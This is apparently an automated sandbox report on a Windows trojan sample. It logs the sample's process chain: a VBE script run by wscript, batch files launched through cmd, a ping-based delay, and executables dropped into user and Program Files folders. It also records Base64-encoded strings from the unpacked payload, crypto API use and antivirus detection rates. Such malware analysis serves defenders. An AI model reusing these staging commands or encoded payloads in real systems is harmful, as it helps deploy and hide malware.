                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008971530_2_00897153
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008962CA0_2_008962CA
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008832F70_2_008832F7
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008943BF0_2_008943BF
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0088C4260_2_0088C426
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008AD4400_2_008AD440
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0088F4610_2_0088F461
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008977EF0_2_008977EF
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008AD8EE0_2_008AD8EE
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0088286B0_2_0088286B
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0088E9B70_2_0088E9B7
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008B19F40_2_008B19F4
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_00896CDC0_2_00896CDC
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_00893E0B0_2_00893E0B
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008A4F9A0_2_008A4F9A
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0088EFE20_2_0088EFE2
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeCode function: 5_2_00007FF848F41EC35_2_00007FF848F41EC3
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeCode function: 5_2_00007FF848F51D555_2_00007FF848F51D55
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeCode function: 5_2_00007FF84913D1C15_2_00007FF84913D1C1
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeCode function: 12_2_00007FF848F31EC312_2_00007FF848F31EC3
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeCode function: 12_2_00007FF848F41D5512_2_00007FF848F41D55
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeCode function: 12_2_00007FF848F3E5CD12_2_00007FF848F3E5CD
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeCode function: 12_2_00007FF84912D3C712_2_00007FF84912D3C7
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BfMGYDNR.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                  Source: o9jDrpZrgR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: String function: 0089EC50 appears 56 times
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: String function: 0089F5F0 appears 31 times
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: String function: 0089EB78 appears 39 times
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_00886FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00886FAA
                                  Source: o9jDrpZrgR.exe, 00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs o9jDrpZrgR.exe
                                  Source: o9jDrpZrgR.exe, 00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs o9jDrpZrgR.exe
                                  Source: o9jDrpZrgR.exe, 00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs o9jDrpZrgR.exe
                                  Source: o9jDrpZrgR.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs o9jDrpZrgR.exe
                                  Source: o9jDrpZrgR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\eQQkRcVr.logJump to behavior
                                  Source: classification engineClassification label: mal100.troj.evad.winEXE@18/43@0/1
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeFile read: C:\Windows\win.iniJump to behavior
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, m9F.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, m9F.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, m9F.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, m9F.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_00886C74 GetLastError,FormatMessageW,0_2_00886C74
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0089A6C2
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "
                                  Source: o9jDrpZrgR.exeReversingLabs: Detection: 65%
                                  Source: o9jDrpZrgR.exeVirustotal: Detection: 69%
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeFile read: C:\Users\user\Desktop\o9jDrpZrgR.exeJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\o9jDrpZrgR.exe C:\Users\user\Desktop\o9jDrpZrgR.exe
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe"
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe C:\reviewruntimeMonitor/BlockrefBrokerperf.exe
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe"
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe C:\reviewruntimeMonitor/BlockrefBrokerperf.exeJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\AppData\Local\Temp\nltb4WKmeRJump to behavior
                                  Source: o9jDrpZrgR.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, s67.csBase64 encoded string: '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
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 8B6.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 76n.csBase64 encoded string: 'UVtEeSHUk4yu9KPxdwSBr+sSkjGQFay1++KROxhl0u6A4n6QgKK9owCeJt4/ibRTaf4E5m/SCzpsURAMEr5Xg3qngaD25tEDnlwMC28qHpOjjYZZ3ftJybEZu9RT7fycp80B+C1+JH+0A7jyMX5ephjAjCm0aInhrTOAyfr2JSpnTXQoEphTKT9lyNJy7CA3kEbeH3HL9tf5TAJ1jraZfyFRNee9l9rkyXMwZL6Yyla2N9LSaYuIx5ETZrU5ZIeG'
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 7YK.csBase64 encoded string: 'uuzZiJXU5s98btEVomQruuLVWIdl8LsBzbXXAtrjRn45ZPAhuiYQKqWAjeDZqvVtA8J9WrV44qaGzP5GH50axc0IEXxfqS3fSL5bGALCNdVdQQKUi6Ru446iHA483zOm'
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 52Z.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, s67.csBase64 encoded string: 'H4sIAAAAAAAEADSbx5KCaBRG32W2LMhpSc45MyvJGQGJTz/0YrrK1tIu+dP97jnV+u+//8jYpjD//1gIzcVNEBbKWVnkj/z9VqdbWHJ/Ct0Qxt91eFHemCwnNh1xqQPju5A17Q7Hqhf6/hZOH2WZUBTkHBJlqQlluQqvU8qjMHdPtwhcWakXC5sffVawlRricM8q38lwlDpIG3yeAwQfGwH8aP18/S+F4UW5RkiEofmVFk/sGYYP5yqEnXTXdRM1bTZKE1jwRcgAHzu8qSSQwAx7h7Es1sfF3umZVKAZZ5ZnSz7Srhf6nJ0AYa1diub4jyTW81MgWy+yRDZITvotl8TGkAtJNKvK1uPGuZG+GL+BN1FAjLVOGWxFoIzhi/xHLLADPz0dfTbwJNI2oohHY4v+phtdiQFgBy8JRW6npKjriMaWKGZctwzESZsWpulZJkbWVATaOIVyvKZSDiaU38jdu2H64991BveZUEIK1QV7LxTLR1pZ6ms2K3DJpRR5IvcjSGtZ6x+ghgWed/GUATY6pr54SnetULE9atyI0iSD8HpRId8NhHJG95f5ywjEU9eRJ6X8aeLIsK0eIjJIx49JT0QPr2bqNtTIjUj4Y8RR7ZW/9Crvlu5EUtSQOkQlc9V1xI03b/2oWZTG2+dIxSkxEWpBtuhIiykpdpwsTgnvTVIoSClFOHAzh/g3w5gCgdgSHHllVZX9RUzV1J6oMjt+d/pMAijDGM5g1+BLzRmEvU88lobL2nW9zjcBFlosXVsN8+di5YYTziWxci2J4DSyOo+AipXKLZaVhayT+PkPMdoOAnnKwCEp32/4ItvqWoKi7hvtCofIetCJtLrwJyJ95COhHjJHsZ8hHsz9xCwql7CFww6ewg8s69tnHZCfS6jaBHtDti5+XAtU1UJeoCPUnmvpqJ/gDpKmv2Q+Ivr4syj4BbVeUexfYweDMcY+zhp8gKQ3SgcysB52kvSdp8zRdx7mTFhLGx0bdFMN3Cm3GDsIbJLUyizkLCMpmGAoM9M0vofFOh86fJzqbWTwaWFu0yhv7fxc1ZDhNkz93qf6CFn7yMqMJ75DQKc6wdZUvU+IQjNCVVv3+ttkpIKSht2+V5xjVeKtpS5o8PJVo+cBVCzV6ggClgN/rd92vVUmWUuWtlT5qzGrpvk5FrCsFlA6qq+PQ4zrofy8Ecy7qU93YTG1gsVDbLXbipz3oI63QskTmJCl6V87Hc4ca1YjkCaEfrbRab5AWapZc5rmLMBNilOi5f80sQwJ//ED6YYW2cSG0eY6VAN0DYRnZrBysv84HaJY0yXj0YmnAJSkUhXQAEPD6BZoRzlqFhjfMRXiDi0CKWvZk9JEA2v1JYJ3wVYD5U+RnuzHwTIwSVblLxVxGx84/rEuf+vg0ThvSXjkZH212X9kW8Y3EihbUACsKtbeFfF/H+757EcC7TbU1qw323waDUujOTKO+mo66ASANniN85W83Ndwq4eYo08FLeyEtKCSzceNaCzl4rlt35qpbMA95s0JfEiUL6CzdL99bndCR9gsHZ8ljjbxUBM6pbnZFjq/HVULlJiwrVCQqIkvm2v0SiS/lnc7VJt7icspYJ8yPhdRLRZs/dUmHnZpat373ATVgdqoYhu4lzJInqdctirMPudFriZs/d1YKnRZKpdMwiW8R0Fw26BVLiuVZo9zFgHrv23uB66kfpROoPu0dT3jMlQpGYQhUi91VC/rEpIea42srGpZ2hyjKMW7LpFvKDPcF3R0JnNchAkF8VuLP6t0+frDhI2vAA0+zIqZz63CmQMmpbg5Amg+JdTmQj5+8l/J+ahHffrpTYlmHbTPRkRfaCylgLOG7oyq7y6aQMDL0jl/q/PndBJccUCNRJEtzHYv60Q8BPnZTPbPCCAS9hqPn5mpYKgZHo9maRBg+tjhZBvyQNvNfilPgsTekdPLmFN5qovqYX6s/EBU4S6k7zmXI4cn91RR+a4K6DWWXMKs8CnuwQeTF87KjXabk1DdO9oCmfsKASNgHR9bmZ/h3uCBz51SjKqkLprDGdp2Sx633lbayQopmpA4oRx6Um4PIhaILge6a+9R2MFNY8W8RRS1li2QppK26kaeO3Xs8PaOLD2vgOyyw1D0sKW4KlFLGkqkmWqX9FJd9lYmQcAqqUhaVj/YuCMnMtofECaKMic/6PCtDk0EnQlFziP6PoNO8b89heFnha/Etao0IegEDJYcFCxQxImfG2OgBwRouKgm8b2JwR9PcamcRdxO7KTmhK2ibwd72oBcqJbrnZiIS0fDY6AbLCl4pVRvAXZho1UJ5Kf2vJLqqy2HBpzLDjIsH7dMW0DOp5Uxm9b8tJ008y4ujoo71MIpbVjJ9Rp8q6BjLTijqZPD7F4y5jwCPNDJukrbwhxq1arSEk0QFYvbo/51pd08oHYA7E5us3kXdogwuu+CKLiP0aj7WFIjGnrkJB1t9xV7zvDssoGz018n7Z2+9bEqPM96YfgFQZQzdkUZhwTfD0gTE1AuGqSdFtwI++CCWZu2bFcQso5MnC3tr2pjDy5UK7V2WnrGUS2AHHSAZxgIgbQOXhFtM/YGJH2v13C/suH4hDPJ2d6xB0/qjkjud39q85pke0kGq+mCFRfLKsc0ruHZmOJ1Xklxhyrg6zkSivdUKz7z8HnCy31sfLPg03awiooA+0on5/MIaw0wm/JVj6WfdrSjkJvEZwTdarksWZPPLjdIydPSpEBm7MkIRWkfmtLj3/LJFzhHARroO5kFg0yIvvLQfoTwA1EeFhCJ9lXDyq4QPBVVXN826ot4FV+m/kry2g8otRrHgLVRn45oxtLLBfyrSjX3aGXOXvwIvDl938bbgcMX56aPQz5xEvsjyPNjbzNdYLU2smDcY0xWkakfH888wBdl4Boslq5a7aF1IEkDUELfWSfdNAyI3sGbPUuY/RE1gsolQwlr+RSl9T2TP46Ylqt1H1bNvkPn0bix7Dns6mMcWVE7os9C2CenB9h
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 8B6.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 76n.csBase64 encoded string: 'UVtEeSHUk4yu9KPxdwSBr+sSkjGQFay1++KROxhl0u6A4n6QgKK9owCeJt4/ibRTaf4E5m/SCzpsURAMEr5Xg3qngaD25tEDnlwMC28qHpOjjYZZ3ftJybEZu9RT7fycp80B+C1+JH+0A7jyMX5ephjAjCm0aInhrTOAyfr2JSpnTXQoEphTKT9lyNJy7CA3kEbeH3HL9tf5TAJ1jraZfyFRNee9l9rkyXMwZL6Yyla2N9LSaYuIx5ETZrU5ZIeG'
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 7YK.csBase64 encoded string: 'uuzZiJXU5s98btEVomQruuLVWIdl8LsBzbXXAtrjRn45ZPAhuiYQKqWAjeDZqvVtA8J9WrV44qaGzP5GH50axc0IEXxfqS3fSL5bGALCNdVdQQKUi6Ru446iHA483zOm'
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 52Z.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeMutant created: \Sessions\1\BaseNamedObjects\Local\24ce2d5742570a51f4be0130d49d0ec60b8bba1c26d1231a555ddb981a05477d
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4332:120:WilError_03
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCommand line argument: sfxname0_2_0089DF1E
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCommand line argument: sfxstime0_2_0089DF1E
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCommand line argument: STARTDLG0_2_0089DF1E
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, E32.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, E32.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJump to behavior
